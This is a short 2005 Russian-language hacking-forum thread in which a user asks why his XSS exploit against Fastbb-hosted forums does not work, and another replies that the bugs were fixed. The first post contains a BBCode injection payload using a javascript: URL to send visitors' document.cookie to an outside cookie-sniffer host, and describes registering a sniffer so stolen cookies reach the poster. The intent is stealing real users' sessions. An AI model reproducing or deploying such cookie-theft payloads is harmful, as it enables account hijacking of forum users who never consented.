Форумы XSS на Fastbb

Discussion in 'Уязвимости CMS/форумов' started by Lord Nikon, 7 Dec 2005.

  1. Lord Nikon

    Lord Nikon Banned

    Joined:
    12 Sep 2005
    Messages:
    224
    Likes Received:
    15
    Reputations:
    -3
    Чо то XSS в Fastbb не проходит посмотрел видео вана,они че закрыли или че то я не так делаю вот например регусь и создаю тему в тему постю сплойт
    [font color=[img src=http://antichat.ru/cgi-bin/s.jpg/style=display:none;background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]][/font]
    но вот img src= и адрес вот тут я че т не догоняю не надо ругать я просто зарегил снифер http://s.netsec.ru//s.gif?id=496 вот теперь думаю как мне жать правильную команду чтоб куки пришли именно ко мне и вобще чет не работает эта уящвимость.Подскажите пожалуйста!!!!!!!!!!!!!!!
    тут просто у вас защита наверно сработаал короче у мя проблема в том что сплойт не работает как правильно сможете подсказать.Спасибо вам Огромное!!
     
  2. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Эти баги уже пофиксили =))
     
  3. Lord Nikon

    Lord Nikon Banned

    Joined:
    12 Sep 2005
    Messages:
    224
    Likes Received:
    15
    Reputations:
    -3
    понятно.